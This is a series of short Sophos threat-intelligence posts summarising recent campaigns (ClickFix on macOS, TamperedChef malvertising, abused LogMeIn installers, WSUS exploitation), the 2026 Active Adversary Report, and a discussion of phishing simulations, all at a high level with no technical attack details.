ClickFix is an increasingly common social engineering technique, which threat actors use to trick users into installing malicious software on their devices. Historically, it’s been aimed at Windows users – but recently we’ve seen three ClickFix campaigns targeting macOS users.

These campaigns, which involve the MacSync infostealer, suggest that approaches and tactics are evolving – possibly in response to investigation and disruption efforts, but also perhaps reflecting wider social and technological trends.

The 2026 Sophos Active Adversary Report is out — and despite the hype, we saw no AI-driven sea change in the threat landscape, based on the 600+ IR and MDR cases that made up our dataset. Attackers mostly stuck with what already works.

Abuse of legitimate tools remained consistent, as did the lack of blocking categories of tools that are known to be routinely abused.

Missing telemetry continued to make it difficult for blue teamers to spot the signal in the noise, and an ongoing lack of phishing-resistant multifactor authentication (MFA) gave the criminals a quiet way in.

The most concerning change has been years in the making: The dominance of identity-related root causes — brute-force attacks, phishing, and other compromised-credential tactics — for successful initial access.

This constellation of tactics leverages weaknesses that can’t be addressed by simple patch hygiene and occasionally acts as a bonus multiplier for attacks in progress.

Key takeaways:

1️⃣ GenAI adds speed, volume, and noise to the threat landscape… but for now, that’s about it.

2️⃣ Identity-related tactics such as compromised credentials, brute-force attacks, and phishing, are by far the most common reason attackers gain initial access.

3️⃣ Attackers have made few changes to specific tools, tactics, or procedures — though one weird blocking trick may make a huge difference for many enterprises.

4️⃣ Saving money by minimizing telemetry collection might be penny-wise, but it’s definitely pound-foolish.

5️⃣ Prevention still beats detection, both in outcomes and in time and effort spent defending.

Read the report here: https://www.sophos.com/en-us/blog/2026-sophos-active-adversary-report

In September 2025, Sophos Managed Detection and Response (MDR) teams identified a malvertising campaign distributing an infostealer dubbed TamperedChef – believed to be part of a wider campaign known as EvilAI.

Previous coverage of this campaign suggests it began on June 26, 2025, with many of the associated websites being registered or first identified on that date. The sites were promoting a trojanized PDF editing application called AppSuite PDF Editor via Google Ads.

This application appeared legitimate to users, but silently deployed an infostealer upon installation, targeting Windows devices.

Although there was a significant proportion of victims in Germany and the UK, it likely reflects the campaign’s widespread global reach, rather than any deliberate targeting of specific regions; we identified 19 countries affected in total.

This large, multi-layered distribution network featured a delayed activation/dormancy period, decoy software, staged payload delivery, abuse of code-signing certificates, and efforts to evade endpoint protection mechanisms.

Users who installed AppSuite PDF Editor should consider any credentials stored in their browsers to be compromised.

Threat actors are well aware that malvertising can be a fruitful and effective infection vector. It’s very possible that the adversaries behind TamperedChef, and others, will cook from a similar recipe in the future.

Read the full article here: https://www.sophos.com/en-us/blog/tamperedchef-serves-bad-ads-with-infostealers-as-the-main-course

We’ve recently observed an increase in a malicious threat actor campaign leveraging GoTo LogMeIn installers distributed via phishing emails. X-Ops’ Labs and MDR teams are currently huddling on an investigation that’s delivering some interesting detection twists.

The trouble starts, as trouble often does, with phishing emails. We’ve seen a wide variety in this investigation so far, from invitations spoofing well-known event-planning sites to unostentatious requests for bids on construction projects.

It got interesting when we looked at the installer itself. GoTo is of course a legitimate enterprise; our investigation found that the installer involved in these attempts is in fact legitimately signed with a valid certificate. That means it’s not simply a matter of flagging any LogMeIn installer as malicious or potentially unwanted.

The X-Ops team is closely monitoring the attacks abusing LogMeIn installers and is updating protection logic as needed, focusing on quick response to new indicators as well as developing proactive behavioral protection strategies. We’ll keep you posted.

Debates around the effectiveness of phishing simulations are widespread. Supporters claim they can boost learning retention rates, help train users’ instincts, reduce risk, and contribute to developing a ‘security-first’ culture.

Detractors point to tick-box compliance, fatigue, unfair and unethical lures, punishing users who ‘fail’ phishing tests (e.g., extra-dull mandatory training, naming and shaming, disciplinary measures), and focusing on failure rather than success.

In fact, two recent (2021 and 2025) studies suggest that phishing training makes no significant difference to susceptibility, and could, counter-intuitively, make users more susceptible (although there are some important caveats to this).

But phishing is often the most prevalent entry mechanism for attackers. It’s cheap and easy, and generative AI may make it even easier. And threat actors know it works. So is there a way to make phishing exercises effective?

Sophos researchers have identified real-world exploitation of a newly disclosed vulnerability in Windows Server Update Services (WSUS), where threat actors are harvesting sensitive data from organizations.

Following public release of proof-of-concept code, attackers began abusing the flaw to steal data from exposed servers across multiple industries — including universities, technology, manufacturing, and healthcare.

“This activity shows that threat actors moved quickly to exploit this critical vulnerability in WSUS to collect valuable data from vulnerable organizations.” — Rafe Pilling, Director of Threat Intelligence, Sophos.

Sophos telemetry has identified six incidents so far, though the real number is likely higher.

Organizations should apply patches promptly and review WSUS configurations to reduce the risk of exploitation.

🔗 Read more and get the full guidance:

https://news.sophos.com/en-us/2025/10/29/windows-server-update-services-wsus-vulnerability-abused-to-harvest-sensitive-data/